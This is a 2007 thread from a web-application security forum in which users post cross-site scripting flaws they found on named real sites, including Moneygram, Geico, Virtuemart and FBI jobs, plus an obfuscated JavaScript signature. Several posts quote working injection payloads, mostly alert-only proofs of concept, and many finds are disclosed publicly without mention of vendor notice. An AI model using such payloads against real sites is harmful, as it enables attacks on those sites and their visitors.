SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: .mario (IP Logged)
Date: February 02, 2007 03:16PM

XSSQLi - deadly combo...

[www.mrrc.de]

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 06:34PM


Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 06:40PM

[www.moneybookers.com]
touch the search field `and money moves`

Re: So it begins
Posted by: tx (IP Logged)
Date: February 02, 2007 07:04PM

[moneygram.com]"onmouseover="alert(this.innerText);"&LC=EN

mouseover the navigation links.

-tx @ lowtech-labs.org

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 07:16PM

rather frame spoofing than XSS, anyway feel happy if your flight is controlled by DFS ;-)
[www.dfs.de]

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 07:39PM

In the frontline to copyright your XSS
[www.gvu.de]



Edited 1 time(s). Last edit at 02/03/2007 03:59AM by kirke.

Re: So it begins
Posted by: rsnake (IP Logged)
Date: February 03, 2007 05:53PM

[www.adobe.com]

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: xknown (IP Logged)
Date: February 06, 2007 07:01AM


google xss
Posted by: alf (IP Logged)
Date: February 06, 2007 02:20PM

yes I'm good ;-)

google XSS flaw by me ( [www.mybeNi.tk] )

[www.google.com]


cheers

btw they were notified.



Edited 2 time(s). Last edit at 02/08/2007 09:16AM by alf.

Re: So it begins
Posted by: tx (IP Logged)
Date: February 07, 2007 08:15PM

I'm gonna go ahead and throw these up here because it appears to be fixed in Joomla 1.0.12 (although that may only be with sites that are using SEF URLs, I'm gonna test it further this evening).
In any event:
[www.joomlapolis.com]";//><script>alert(String.fromCharCode(88,83,83));</script><p%20id="3/

[virtuemart.net]";//></script><script>alert(1);var%20i="i

[virtuemart.net]";//><script>alert(1);</script><p%20id="3

[virtuemart.net]";//><script>alert(1);</script><p%20id="3

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/07/2007 08:15PM by tx.

Re: So it begins
Posted by: Jizzabel (IP Logged)
Date: February 08, 2007 06:44AM


Re: So it begins
Posted by: Luny (IP Logged)
Date: February 09, 2007 04:28PM

[frwebgate.access.gpo.gov]:

[ats.nist.gov];

xss with error & script info displayed:
[cindex.camden.gov.uk];

cleaner output of the above url (no xss):
[cindex.camden.gov.uk]

[www.csm.ornl.gov]

[www.ca.sandia.gov];

---------------
Digital footprints suck. Learn to walk on your hands.
[www.youfucktard.com]



Edited 4 time(s). Last edit at 02/09/2007 08:01PM by Luny.

Re: So it begins
Posted by: Hong (IP Logged)
Date: February 12, 2007 02:48AM

[myweb2.search.yahoo.com]
[www.yahoo.americangreetings.com]
IE6 only

[search.xanga.com]
[www.jobsdb.com]
[search.tom.com]

- Hong



Edited 1 time(s). Last edit at 02/12/2007 05:04AM by Hong.

Re: So it begins
Posted by: bubbles (IP Logged)
Date: February 12, 2007 10:43PM

Go to
[www.fbijobs.gov]

and enter <script>alert("xss");</script> in the search field. I tried to find whiteacid's script that forwards post vulns... But I couldn't.

-bubbles
[webmastertutorials.net]

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 13, 2007 02:26AM

You fat:

[www.rawrcore.net]

.GOV EXPLOITS! H0mGAZ!11

[www.rawrcore.net]

and I guess I'll throw this one out there because I published like a year ago and no one seemed to care:

[secure.geico.com]

WHY DOES EVERYONE IGNORE MY EXPLOITS!!??! WAHHH!!1

Re: So it begins
Posted by: trev (IP Logged)
Date: February 13, 2007 09:06AM

bubbles, you don't need the post forwarder. This form accepts GET input: [www.fbijobs.gov]

But this one has been there already: [sla.ckers.org]

Re: So it begins
Posted by: trev (IP Logged)
Date: February 13, 2007 12:24PM

It is ironical... [marketwatch.nytimes.com]



Edited 1 time(s). Last edit at 02/13/2007 12:25PM by trev.

Re: So it begins
Posted by: rdivilbiss (IP Logged)
Date: February 13, 2007 12:28PM

Lockdown Wrote:
>
> [secure.geico.com]
> A_firstName=lawl%22%3E%3Cbody%20onload=%22alert('l
> ol');document.write('An%20XSS%20so%20easy,%20even%
> 20a%20caveman%20can%20do%20it.');%22%3E%3Cspan
>
>

Funny how much they spend on TV ads, and apparently little on the IT side.

I love their TV commercials, though, LOL.

Re: So it begins
Posted by: bubbles (IP Logged)
Date: February 13, 2007 04:28PM

@Trev
Yeah, I figured it had been found already, but I didn't want to search through 39 pages to find it :)

-bubbles
[webmastertutorials.net]

Re: So it begins
Posted by: trev (IP Logged)
Date: February 13, 2007 05:10PM

bubbles, you don't have to - that's what the forum search is for.

Re: So it begins
Posted by: bubbles (IP Logged)
Date: February 14, 2007 08:23AM

Orly, I didn't even know this forum had a search... I'll keep that in mind for next time.

-bubbles
[webmastertutorials.net]

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 14, 2007 09:47PM

<3 Geico commercials.

Cigarettes [www.smokerswelcome.com]

[www.philipmorrisusa.com]

-Lockdown-

[www.rawrcore.net]



Edited 2 time(s). Last edit at 02/15/2007 01:55AM by Lockdown.

Re: So it begins
Posted by: tx (IP Logged)
Date: February 15, 2007 05:04PM

[www.networkcomputing.com]";alert(String.fromCharCode(88,83,83));ds_pageName="

-tx @ lowtech-labs.org

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 16, 2007 01:58PM

nice list with mainly (i)frame spoofing again, posting from SkyOut seen at lists.grok.org.uk/pipermail/full-disclosure/2007-February/052496.html :

[baseportal.com]

your money is as safe as XSS in Austria ;-)

Re: So it begins
Posted by: rsnake (IP Logged)
Date: February 16, 2007 05:21PM

[www.mpaa.org]

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: tx (IP Logged)
Date: February 16, 2007 05:36PM

nice one!

-tx @ lowtech-labs.org

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 16, 2007 08:37PM


Re: So it begins
Posted by: kirke (IP Logged)
Date: February 17, 2007 02:30PM

XSS friendly site, inserts type="text/javascript" if we forget it :-))

[www.bvdw.org]

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 17, 2007 09:45PM

ROFL @ Above

We know we're insecure, but we can't have hackers not adhering to w3c standards!

-Lockdown-

[www.rawrcore.net]

Re: So it begins
Posted by: rsnake (IP Logged)
Date: February 17, 2007 10:57PM

Hahah! I've never seen that before. How nice of them to help you out like that.

- RSnake
Gotta love it. http://ha.ckers.org


